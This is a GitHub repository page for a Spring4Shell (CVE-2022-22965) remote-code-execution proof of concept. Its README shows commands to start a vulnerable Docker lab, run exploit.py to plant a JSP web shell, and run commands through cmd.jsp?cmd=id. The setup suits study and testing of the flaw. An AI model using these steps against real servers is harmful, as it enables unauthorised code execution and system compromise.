Skip to content
/ CVE-2022-22965 Public

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

13 stars 8 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

me2nuk/CVE-2022-22965

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
src
src
 
 
target
target
 
 
CVE-2022-22965 RCE Exploit.mp4
CVE-2022-22965 RCE Exploit.mp4
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
pom.xml
pom.xml
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Spring4Shell(CVE-2022-22965)

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

Spring4Shell(CVE-2022-22965) Exploit Demo

CVE-2022-22965.RCE.Exploit.mp4

Build

docker pull me2nuk/cves:2022-22965
docker run -it -p 8080:8080 --name=spring4shell me2nuk/cves:2022-22965

POC

python3 -m pip install -r requirements.txt
python3 exploit.py --url="http://localhost:8080/exploit/greeting" --dir="webapps/ROOT" --file="cmd"
curl http://localhost:8080/cmd.jsp?cmd=id

References

About

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

Resources

Readme
Activity

Stars

13 stars

Watchers

1 watching

Forks

8 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages